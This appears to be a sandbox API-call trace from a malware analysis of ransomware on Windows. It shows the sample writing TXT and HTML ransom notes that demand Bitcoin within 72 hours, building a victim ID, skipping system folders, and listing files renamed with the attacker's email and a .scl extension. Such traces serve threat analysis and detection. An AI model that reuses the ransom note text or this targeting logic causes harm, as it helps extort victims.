	[0194.602] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0194.602] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0194.602] WriteFile (in: hFile=0x388, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0194.732] CloseHandle (hObject=0x388) returned 1
	[0194.732] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.732] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.733] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0194.734] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0194.734] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0194.734] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0194.735] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0194.735] WriteFile (in: hFile=0x388, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0194.735] CloseHandle (hObject=0x388) returned 1
	[0194.735] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.736] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.736] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0194.736] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HELP_DECRYPT_YOUR_FILES.HTML") returned 104
	[0194.736] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0194.737] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0194.737] WriteFile (in: hFile=0x388, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0194.740] CloseHandle (hObject=0x388) returned 1
	[0194.740] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.740] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.741] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.741] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0194.742] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0194.742] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0194.743] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0194.743] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0194.743] WriteFile (in: hFile=0x388, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0194.743] CloseHandle (hObject=0x388) returned 1
	[0194.743] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192bb530, ftCreationTime.dwHighDateTime=0x1d9681f, ftLastAccessTime.dwLowDateTime=0x8d84d41a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d9a4549, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0194.744] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*") returned 79
	[0194.744] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0194.744] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*", cchLength=0x4f | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*") returned 0x4f
	[0194.744] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.744] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="windows") returned 0x0
	[0194.745] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.745] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="boot") returned 0x0
	[0194.745] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.745] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="system volume information") returned 0x0
	[0194.745] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.748] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0194.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.753] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="temp") returned 0x0
	[0194.753] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.754] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="program files") returned 0x0
	[0194.815] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.816] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="program files (x86)") returned 0x0
	[0194.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.816] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="appdata") returned 0x0
	[0194.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.816] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="application data") returned 0x0
	[0194.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.817] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="winnt") returned 0x0
	[0194.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.817] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="tmp") returned 0x0
	[0194.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.817] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="cache") returned 0x0
	[0194.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.817] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="temporary internet files") returned 0x0
	[0194.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.818] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="webcache") returned 0x0
	[0194.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.818] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="inetcache") returned 0x0
	[0194.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.818] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="nvidia") returned 0x0
	[0194.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.819] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="packages") returned 0x0
	[0194.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.819] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="cookies") returned 0x0
	[0194.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.819] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="programdata") returned 0x0
	[0194.820] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0194.820] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0194.820] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192bb530, ftCreationTime.dwHighDateTime=0x1d9681f, ftLastAccessTime.dwLowDateTime=0x8d84d41a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d9a4549, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0194.820] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0194.820] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9a4549, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d9a4549, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d9a4549, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0194.820] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d84d41a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d84d41a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d9a4549, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0194.820] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d6a9a41, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d6a9a41, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d6cfa73, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13250, dwReserved0=0x0, dwReserved1=0x0, cFileName="hfo3g0iul3kxjhrxd0-o.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HFO3G0~1.SCL")) returned 1
	[0194.820] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d7429b8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d7429b8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d7683fb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xb390, dwReserved0=0x0, dwReserved1=0x0, cFileName="uf ibx-mj-z3dshsxti.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UFIBX-~1.SCL")) returned 1
	[0194.820] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d7dac93, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d7dac93, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d7dac93, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x163f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uwzxj0yl2nk.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UWZXJ0~1.SCL")) returned 1
	[0194.821] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d826fc3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d826fc3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d84d41a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xbdc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uya w3gj.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UYAW3G~1.SCL")) returned 1
	[0194.821] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d826fc3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d826fc3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d84d41a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xbdc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uya w3gj.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UYAW3G~1.SCL")) returned 0
	[0194.821] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0194.821] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0194.821] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d610d29, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d610d29, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d65d04d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0194.822] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d610d29, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d610d29, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d610d29, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0194.822] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ca81e75, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ca81e75, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8caa80ca, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd590, dwReserved0=0x0, dwReserved1=0x0, cFileName="hk5 gvpu6w_qavxb7ov.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HK5GVP~1.SCL")) returned 1
	[0194.822] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cb8ccb2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8cb8ccb2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8cb8ccb2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xe3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idc41.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="IDC41W~1.SCL")) returned 1
	[0194.822] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d46d4eb, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d46d4eb, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d46d4eb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x10940, dwReserved0=0x0, dwReserved1=0x0, cFileName="qcnfjxg4t34hehxggp.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="QCNFJX~1.SCL")) returned 1
	[0194.822] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d5c463e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d5c463e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d5eaba4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x166e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sarxnz6avb1lkhe2u.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="SARXNZ~1.SCL")) returned 1
	[0194.822] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d5c463e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8d5c463e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d5eaba4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x166e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sarxnz6avb1lkhe2u.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="SARXNZ~1.SCL")) returned 0
	[0194.822] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0194.822] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0194.823] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c524775, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c524775, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c54abad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x11330, dwReserved0=0x0, dwReserved1=0x0, cFileName="ku2urug.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="KU2URU~1.SCL")) returned 1
	[0194.823] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c570bfa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c570bfa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c59728e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x45d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qffscmksuu.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="QFFSCM~1.SCL")) returned 1
